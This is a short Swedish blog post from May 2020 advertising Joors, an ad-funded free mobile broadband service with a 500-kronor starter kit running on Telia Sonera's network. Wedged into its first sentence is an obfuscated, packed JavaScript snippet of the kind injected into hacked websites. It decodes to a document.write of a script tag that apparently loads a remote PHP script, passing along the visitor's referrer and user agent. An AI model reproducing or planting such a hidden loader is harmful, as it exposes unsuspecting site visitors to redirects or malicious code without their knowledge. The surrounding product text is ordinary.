Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Surfa kostnadsfritt med Joors mobila bredband

Sebastian

Känner eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ynnbr|var|u0026u|referrer|dhyiz||js|php’.split(’|’),0,{}))
du att det börjar knipa i plånboken? Kanske måste du dra ner på några utgifter varje månad. Nu kommer ett nytt och ganska smart koncept. Gratis mobilt bredband. Med Joors kan du nu surfa helt kostnadsfritt varje månad. Betalningen görs via reklam som du ser någon gång då och då.

Varje månad får du 2 GB att surfa för. Kanske inte jätte mycket men det räcker för att surfa runt lite på hemsidor. Vi ska inte ljuga, det kostar en liten avgift, genom att betala in en engångsavgift på 500 kronor får du ett litet usb-stick hemskickat med ett tillhörande sim-kort. Därefter är det reklam som finansierar projektet. Det har varit mycket snack om hur man skulle kunna finansiera liknande tjänster med reklam och Joors verkar ha kommit en bit på vägen.

Joors är en virtuell operatör som använder Telia Soneras nätverk. På de flesta platser i landet kan du komma upp i hastigheter som är helt acceptabla.

Sugen? Surfa in här om du vill läsa mer eller beställa tjänsten: Joors